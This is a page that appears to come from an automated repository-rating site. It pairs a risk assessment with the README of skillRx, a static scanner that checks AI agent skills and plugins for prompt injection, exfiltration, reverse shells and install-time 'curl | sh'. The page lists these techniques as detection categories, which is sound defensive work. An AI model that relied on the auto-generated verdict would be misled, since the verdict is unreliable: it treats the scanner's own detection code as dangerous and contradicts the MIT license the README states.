skillRx
Health Warn
- No license — Repository has no license file
- Description — Repository has a description
- Active repo — Last push 0 days ago
- Low visibility — Only 9 GitHub stars
Code Fail
- exec() — Shell command execution in src/analyzers/dangerousPerms.js
- rm -rf — Recursive force deletion command in src/analyzers/dangerousPerms.js
- network request — Outbound network request in src/analyzers/dangerousPerms.js
- exec() — Shell command execution in src/analyzers/exfiltration.js
- exec() — Shell command execution in src/analyzers/postinstall.js
- exec() — Shell command execution in src/analyzers/promptInjection.js
- exec() — Shell command execution in src/analyzers/secretsAndCreds.js
- network request — Outbound network request in src/analyzers/secretsAndCreds.js
- exec() — Shell command execution in src/analyzers/shadowFeatures.js
- network request — Outbound network request in src/analyzers/shadowFeatures.js
Permissions Pass
- Permissions — No dangerous permissions requested
This tool is a security scanner designed to analyze AI agent skills and plugins. It reviews code repositories before installation and provides a trust rating to help developers avoid malicious packages.
Security Assessment
Overall Risk: Medium to High. While the tool is designed to inspect code for vulnerabilities, its own source code contains multiple alarming elements. There are numerous instances of shell command execution (`exec()`) across its core analyzers, including a highly dangerous `rm -rf` recursive force deletion command. Additionally, it makes several outbound network requests during its analysis routines. Although no hardcoded secrets were found and the package itself does not request dangerous system permissions, the extensive use of shell execution and file deletion operations within its code warrants careful caution.
Quality Assessment
The project is very actively maintained, with its most recent push happening just today. However, it currently suffers from extremely low community visibility with only 9 GitHub stars. Furthermore, the repository lacks a proper open-source license, which is a significant drawback for enterprise or commercial use. This lack of licensing and low community adoption means there has been minimal external auditing of the codebase by the broader security community.
Verdict
Use with caution. While its active maintenance is a plus, developers should be wary of the unlicensed status, low community trust, and multiple internal shell execution commands before integrating it into their workflows.
Security scanner for AI agent skills and plugins
skillRx
Security scanner for AI agent skills and plugins. Reviews the code before you install it.
Usage
npx skillrx owner/repo
That's it. skillrx clones the repo, analyzes it, and gives you a verdict: TRUSTED, CAUTION, RISKY, or MALICIOUS.
What you can scan
- Claude Code skills and plugins
- Codex skills and plugins
- Skills for 40+ other agents (Cursor, Aider, Continue.dev, Vercel AI SDK, OpenAI Assistants, MCP, etc.)
If it ships as a skill or plugin, skillrx reads it.
Two ways to scan
Full repository — point skillrx at a repo (or local folder). It scans the whole tree you give it (respecting filters and limits).
Single skill in a monorepo — for big skills collections (for example anthropics/skills), use --skill <name> so only skills/<name> is fetched with a sparse checkout instead of cloning everything.
npx skillrx anthropics/skills --skill frontend-design
Full repository |
Single skill (--skill) |
What we look for
| Area | What it detects |
|---|---|
| Prompt injection | Attempts to hijack the agent's role or coerce its tools |
| Shadow features | What the README promises vs what the code actually does |
| Exfiltration | Odd endpoints, URL shorteners, hardcoded IPs, DNS exfil |
| Secrets | Exposed API keys, tokens, JWTs, private blocks |
| Dangerous permissions | Destructive shell, persistence, privilege escalation |
| Post-install scripts | npm lifecycle hooks, `curl |
How the score is calculated
Starts at 100. Each finding subtracts points based on severity:
- High: −25
- Medium: −10
- Low: −5
If a critical rule fires (hardcoded secrets, reverse shells, install-time curl | sh, severe prompt injection), the result jumps straight to MALICIOUS with score 0.
| Range | Verdict |
|---|---|
| 80–100 | TRUSTED |
| 50–79 | CAUTION |
| 0–49 | RISKY |
| Critical rule | MALICIOUS |
Useful flags
npx skillrx owner/repo --full # show every finding
npx skillrx owner/repo --json # JSON output
No execution
skillrx does not run npm install, node, or python against the repo. It only reads files and applies patterns. Pure static analysis, 100% offline (except for the initial clone).
License
MIT
Reviews (0)
Sign in to leave a review.
Leave a reviewNo results found